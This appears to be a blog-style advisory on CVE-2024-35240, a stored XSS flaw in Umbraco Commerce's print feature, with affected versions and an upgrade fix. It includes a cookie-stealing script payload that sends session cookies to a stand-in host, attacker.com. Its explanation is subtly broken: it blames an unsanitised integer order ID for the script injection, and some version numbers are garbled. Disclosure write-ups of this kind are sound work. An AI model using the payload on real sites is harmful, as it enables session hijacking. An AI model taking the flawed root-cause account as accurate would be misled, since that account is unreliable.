CVE-2024-35240 - Umbraco Commerce Stored Cross-site Scripting (XSS) Vulnerability in Print Functionality

Umbraco Commerce is a popular open source .NET e-commerce solution that is widely used by developers around the world. However, being an open source application also means that it is prone to security vulnerabilities. In this post, we will discuss a critical security vulnerability in Umbraco Commerce, identified as CVE-2024-35240, which is a stored Cross-site Scripting (XSS) issue in its Print Functionality feature.

CVE-2024-35240: Stored XSS Vulnerability

A stored Cross-site Scripting (XSS) vulnerability exists in Umbraco Commerce's Print Functionality feature. The vulnerability allows an attacker to craft a specially designed script that can be injected into the print functionality of the application. By exploiting this vulnerability, an attacker can execute malicious code within the context of the user's browser, potentially enabling a range of malicious actions, such as stealing session cookies, displaying fake content, or redirecting to malicious websites.

The vulnerable code snippet is as follows

public ActionResult Print(int orderId)
{
    var order = _orderService.GetOrderById(orderId);
    ViewBag.Order = order;

    return View();
}

In the above code snippet, the orderId parameter is obtained from the HTTP request and is not sanitized before being passed to the GetOrderById() function. This lack of input validation makes it possible for an attacker to inject malicious code into the print functionality.

Impact and Exploit Details

An attacker could exploit this vulnerability by crafting a malicious script that is then injected into the print functionality of the affected Umbraco Commerce application. This malicious script would then be executed within the context of the user's browser, potentially enabling a range of malicious actions, such as stealing session cookies, displaying fake content, or redirecting to malicious websites.

For instance, the following JavaScript payload could be used to exploit the vulnerability

<script>document.location='http://attacker.com/cookie-stealer.php?cookie='+document.cookie</script>;

Affected Versions and Mitigation

Umbraco Commerce versions 12.1.3, 10..4, and earlier are affected by this vulnerability. The issue has been fixed in versions 12.1.4 and 10..5. Users are advised to upgrade their Umbraco Commerce installations to the latest version to mitigate this vulnerability. There are no known workarounds for this issue.

For more information about this vulnerability, please refer to the following links

1. Umbraco Commerce Official Website: https://umbraco.com/products/umbraco-commerce/
2. CVE-2024-35240 Detail: https://nvd.nist.gov/vuln/detail/CVE-2024-35240

Conclusion

In summary, CVE-2024-35240 is a critical stored Cross-site Scripting (XSS) vulnerability in Umbraco Commerce, which enables attackers to inject malicious code into the Print Functionality feature. This issue has been addressed in versions 12.1.4 and 10..5, and users are advised to upgrade their installations to protect themselves from this vulnerability. There are no known workarounds for this issue.

Timeline

Published on: 05/28/2024 21:16:31 UTC
Last modified on: 05/29/2024 13:02:09 UTC